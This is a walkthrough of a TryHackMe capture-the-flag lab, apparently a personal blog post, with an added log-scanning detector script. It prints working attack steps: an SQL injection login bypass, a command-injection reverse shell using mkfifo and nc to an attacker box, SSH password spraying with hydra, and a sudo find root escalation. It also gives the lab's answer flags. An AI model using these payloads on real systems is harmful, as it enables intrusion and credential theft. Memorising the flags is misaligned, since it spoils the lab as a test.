June 3, 2026
TryHackMe’s “Operation Promotion” CTF Walkthrough
Omer David
I started by enumerating the machine with nmap and found a few open ports:
nmap -sV -sS -T4 -p- [target_ip]
I ran gobuster to enumerate the web server's directories and found an admin login page.
gobuster dir -u http://[target_ip] -w /usr/share/wordlists/dirb/common.txt
The login page form was vulnerable to SQL injection:
' OR 1=1 -- -
In the /admin/dashboard.php path we had a user lookup tool that allowed us to view a user record by providing an ID.
The user with the ID of 7 had a note that exposed a path to a ping.php file, which was vulnerable to command injection.
I was able to view the source code for ping.php by injecting the following into the host parameter of the request:
http://[target_ip]/admin/sysmaint-checks/ping.php?host=10.0.0.0%0acat%20ping.php
From this I was able to inject a reverse shell payload and gain access as www-data.
V LISTENER SET UP ON MY ATTACKBOX V
nc -lvnp 4444
V THIS WAS THE PAYLOAD INJECTED V
10.0.0.0%0arm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20http%3A%2F%2F[attackbox_ip]%204444%20%3E%2Ftmp%2Ff
When reviewing /var/www/html/admin/index.php I found a call in the code to a database (/var/lib/recruitcorp/app.db).
I used sqlite3 to read the mentioned database.
I also found a password for a user named jford, hashed with bcrypt, but was not able to crack the hash.
At this point I got completely stuck and, to be honest, for the next part I had to get some ideas from other walkthroughs. To be completely transparent, I think this solution is stupid, but that's the way this lab was built, I guess.
Credit given to 0xb0b and his great walkthrough over at https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-promotion for the next part of the solution.
When looking at the main page we can see the main theme is "spring 2026".
So with that in mind, we will create a custom wordlist that we will later use to password spray the user "jford" and gain access to his user via ssh.
We start by creating a text file containing the word "Spring2026":
echo Spring2026 > spring2026.txt
We will then use hashcat to transform our one-word text file into a wordlist containing thousands of variations of our word.
hashcat --stdout spring2026.txt -r /usr/local/hashcat/rules/dive.rule > wordlist.txt
With that done we can use hydra to password spray the user "jford":
hydra -vv -l jford -P wordlist.txt 10.114.139.118 ssh
Now that we cracked the password for user jford we can connect to ssh and obtain the flag (THM{bdbee0a91ebcb0b0fafde931223efe09}) that is located in the user's home folder.
After investigating jford's permissions we were able to see that he is allowed to run the find command with root permissions:
sudo -l
That means we can get a shell as root by running the find command with the -exec flag (credit to gtfobins.org for this payload, check them out at https://gtfobins.org/gtfobins/find/#shell).
sudo find . -exec /bin/sh \; -quit
With that done we are now the root user and we're able to read the flag (THM{d999a1f6319a9c5b48c067dfab314ba2}) in the root directory.
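The ping.php requests earlier in this walkthrough carry a second command after a URL-encoded newline (%0a) in the host parameter. As an added example (not part of the original walkthrough or the lab's code), this Python script shows how a defender could flag such requests in a web access log by accepting only a bare IP address or hostname as the value. It assumes combined log format and that the endpoint never needs anything but an IP or hostname; the function names and sample lines are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the ping endpoint only ever needs an IP address or a DNS hostname.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
# \Z, not $: in Python, $ would also match just before a trailing newline.
HOSTNAME = re.compile(rf"(?=.{{1,253}}\Z)(?:{LABEL}\.)*{LABEL}\Z")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_plain_host(value: str) -> bool:
    """True only for a bare IP address or hostname with nothing after it."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME.match(value) is not None

def suspicious_ping_requests(log_lines, endpoint="/ping.php"):
    """Return (line_number, decoded_host) for endpoint hits whose host is not a plain host."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(endpoint):
            continue
        # parse_qs percent-decodes, so %0a becomes a real newline here.
        for host in parse_qs(url.query, keep_blank_values=True).get("host", []):
            if not is_plain_host(host):
                hits.append((number, host))
    return hits

# Constructed sample lines (combined log format, documentation address range).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2026:10:00:01 +0000] "GET /admin/sysmaint-checks/ping.php?host=10.0.0.7 HTTP/1.1" 200 312',
    '203.0.113.5 - - [03/Jun/2026:10:00:09 +0000] "GET /admin/sysmaint-checks/ping.php?host=10.0.0.0%0acat%20ping.php HTTP/1.1" 200 2048',
    '203.0.113.5 - - [03/Jun/2026:10:00:15 +0000] "GET /admin/sysmaint-checks/ping.php?host=db.internal.example HTTP/1.1" 200 298',
    '203.0.113.5 - - [03/Jun/2026:10:00:20 +0000] "GET /admin/dashboard.php?id=7 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, host in suspicious_ping_requests(SAMPLE_LOG):
        print(f"line {number}: host={host!r}")
```

The same allowlist check, applied server-side before the value reaches any shell command, is also the fix for the endpoint itself.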
Conclusion
In this very instructive CTF we began by enumerating the machine, which led to finding a login page vulnerable to SQL injection. We were able to obtain a reverse shell thanks to a PHP script vulnerable to OS command injection.
We were able to gain access to a privileged user named "jford" by creating a custom wordlist and using it to password spray them. This led to us obtaining the first flag, as well as achieving root privileges and obtaining the second flag by running a command through jford with root permissions.
I learned a lot from this CTF and I hope you guys enjoyed it as well, thank you so much for reading this far!